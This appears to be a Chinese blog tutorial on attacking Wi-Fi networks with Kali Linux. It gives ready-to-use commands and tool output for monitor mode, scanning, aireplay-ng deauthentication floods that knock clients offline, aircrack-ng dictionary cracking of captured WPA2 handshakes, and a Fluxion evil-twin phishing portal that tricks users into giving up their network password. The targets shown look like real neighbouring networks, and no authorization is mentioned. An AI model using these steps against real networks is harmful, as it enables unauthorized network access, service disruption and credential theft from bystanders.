kali无线网渗透

kali无线网渗透

前提

——无线网卡配置问题

#无线渗透工具前提:无线网卡
#环境:本来用作监听功能的3037芯片无线网卡,自己胡乱调,一不小心调试成了物理网卡的功能,变成了WLAN2网卡,结果用在了Windows系统上!如果你也是这样,点开你的网络适配器看看吧!
#解决思路:
1.删驱动设备
	删除Windows上的无线网卡驱动,商家说的是免驱网卡,即插即用。
	右键我的电脑➡管理➡设备管理➡找到该网卡驱动(网卡名字)➡直接删除
2.更改网卡工作模式
重新开启虚拟机连接无线网卡,发觉无线网卡的工作模式被更改为 Managed
监听模式是Monitor,要给他改过来
方法:关闭网卡➡修改模式➡开启网卡
┌──(root kali)-[~]
└─# ifconfig wlan0 down
┌──(root kali)-[~]
└─# iwconfig wlan0 mode monitor
┌──(root kali)-[~]
└─# ifconfig wlan0 up
3.查看无线网卡状态——是否为监听模式Monitor
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
3.检测环境
┌──(root kali)-[~]
└─# airmon-ng check kill 

常规

——在网卡无问题时来到这一步

1.开启监听模式
─# airmon-ng start wlan0
2.开始扫描WIFI
└─# airodump-ng wlan0
CH  7 ][ Elapsed: 1 min ][ 2022-09-16 22:44                                                BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID              5C:02:14:F8:7F:9E  -83        0        1    0   6  360   WPA2 CCMP   PSK  蹭网请交钱       3C:06:A7:B3:D6:FC  -45       31        0    0   1  270   WPA2 CCMP   PSK  TP-LINK_777       44:FB:5A:67:21:8C  -45       31        0    0   3  130   WPA2 CCMP   PSK  CU_CP7b     94:BF:80:1A:F6:8C  -57       26        0    0   3  130   WPA2 CCMP   PSK  CU_G4Sz     10:39:4E:00:6A:ED  -59       31        1    0   2  130   WPA2 CCMP   PSK  ChinaUnicom-6AE8
#BSSID:wifi的MAC地址
#PWR:wifi信号强度,数值越小越信号强
#DATA:数据量,越大使用人越多
#CH:wifi的信道频率(频道)
#ESSID:wifi名字,中文可能乱码
3.抓取wifi数据包
└─# airodump-ng --bssid 12:4A:6A:B2:0C:0C -c 1 -w ~/wlan/2/2 wlan0mon
#airodump-ng:扫描
#--bssid:路由MAC地址
#-c;信道频率
#-w:保存路径	注意路径必须存在
#wlan0mon:设备名
4.断网攻击——使对方掉线重连,捕获cap握手包
└─# aireplay-ng -0 16666 -a 12:4A:6A:B2:0C:0C  -c 74:4C:A1:7D:06:6B -D wlan0mon
#aireplay-ng:攻击
#-0:数据包量
#-a:路由MAC
#-c:客户端MAC	如手机电脑等等
#-D:设备名
5.在抓包终端看到WPA handshake就是说捕获成功了
#注意在捕获成功将两个终端结束掉,不然对方一直处于断网状态
6.破解握手包
└─# aircrack-ng ~/fluxion/attacks/Handshake\ Snooper/handshakes/ChinaUnicom-6AE8-10:39:4E:00:6A:ED.cap -w /mnt/windows/dictionary/superdic.txt 
#aircarack-ng:破解
#xx.cap:握手包
#-w:指定字典路径

特殊

——网站钓鱼

1.安装钓鱼工具
└─# git clone https://github.com/FluxionNetwork/fluxion      
2.安装钓鱼工具依赖
└─# ./fluxion.sh -i
3.使用钓鱼工具
└─# ./fluxion.sh
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
[fluxion@kali]-[~] 2
#选择方式
----------------------------------------------------
[*] 选择要扫描的信道                                                                         
        [1] 扫描所有信道  (2.4GHz)                                                           
        [2] 扫描所有信道  (5GHz)                                                             
        [3] 扫描所有信道  (2.4GHz & 5Ghz)                                                   
        [5] 返回                                                                           
[fluxion@kali]-[~] 3
#开始扫描WIFI,进行选取Ctrl+C结束扫描终端
----------------------------------------------------
ESSID        			   QLTY PWR STA CH SECURITY            BSSID
[001] TP-LINK_312        	16% -85   0  6 WPA2      			18:F2:2C:B6:37:D4
[002] ChinaNet-2.4G-9901 	16% -85   0 11 WPA2      			FC:60:9B:1B:99:03
......
[fluxion@kali]-[~] 50
#选取编号
-----------------------------------------------------
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[2] 跳过                                                                                   
[3] 重试                                                                                   
[4] 返回 
[fluxion@kali]-[~] 2
#根据提示做选择
-----------------------------------------------------
[*] 此攻击已经配置完毕
        [1] 恢复攻击
        [2] 重置攻击
[fluxion@kali]-[~] 2
#因为我已经配置过攻击,所以再次进行时要选择,重置攻击
-----------------------------------------------------
[*] 选择一种方式来检查握手包获取状态
        [1] 监听模式 (被动)
        [2] aireplay-ng 解除认证方式 (侵略性)
        [3] mdk4 解除认证方式 (侵略性)
        [4] 返回
[fluxion@kali]-[~] 2
#常规选择2
-----------------------------------------------------
[*] 选择Hash的验证方法
        [1] aircrack-ng 验证 (不推荐)
        [2] cowpatty 验证 (推荐用这个)
        [3] 返回
[fluxion@kali]-[~] 1
#1或2都可以,建议配套
----------------------------------------------------
[*] 每隔多久检查一次握手包
        [1] 每30秒钟 (推荐).
        [2] 每60秒钟
        [3] 每90秒钟
        [4] 返回
[fluxion@kali]-[~] 1
#抓包时间设置
---------------------------------------------------
[*] 如何进行验证?
        [1] Asynchronously (fast systems only).
        [2] Synchronously (推荐).
        [3] 返回
[fluxion@kali]-[~] 2
#选择2
--------------------------------------------------
[*] Handshake Snooper 正在进行攻击......
        [1] 选择启动攻击方式
        [2] 退出
[fluxion@kali]-[~] 1
#开始对数据包捕获,捕获成功后再进行选择攻击方式(左下角会提示攻击是否成功)
--------------------------------------------------
[*] 请选择一个攻击方式
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
[fluxion@kali]-[~] 1
#这时候可以进行选择钓鱼攻击
--------------------------------------------------
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[2] 跳过                                                                                   
[3] 重试                                                                                   
[4] 返回                                                                                   
[fluxion@kali]-[~] 2
#选择2
--------------------------------------------------
[*] 此攻击已经配置完毕
        [1] 恢复攻击
        [2] 重置攻击
[fluxion@kali]-[~] 2
#因为我已经配置过攻击,所以再次进行时要选择,重置攻击
--------------------------------------------------
[*] 为接入点选择一个接口
[1] eth0     [+] Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)   
[2] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[3] 重试                                                                                   
[4] 返回                                                                                   
[fluxion@kali]-[~] 2
#选择无线网卡设备
---------------------------------------------------
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
[fluxion@kali]-[~] 
#选择mdk4方式
---------------------------------------------------
[*] 选择一个接入点       
        [1] 流氓 AP - hostapd (推荐)
        [2] 流氓 AP - airbase-ng (缓慢)
        [3] 返回
[fluxion@kali]-[~] 1
#选择钓鱼类型
---------------------------------------------------
[*] 请选择验证密码方式                                       
        [1] hash - cowpatty
        [2] hash - aircrack-ng (default, unreliable)
        [3] 返回
[fluxion@kali]-[~] 1
#使用hash值进行攻击
----------------------------------------------------
#之后就是选择使用抓取到的hash文件,或者手动配置
#使用cowpatty验证
#创建SSL证书
#断开对方网络	断网攻击
#选择钓鱼语言	中文 		3
#弹出6个窗口	右上角会显示对方密码是否成功获取
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值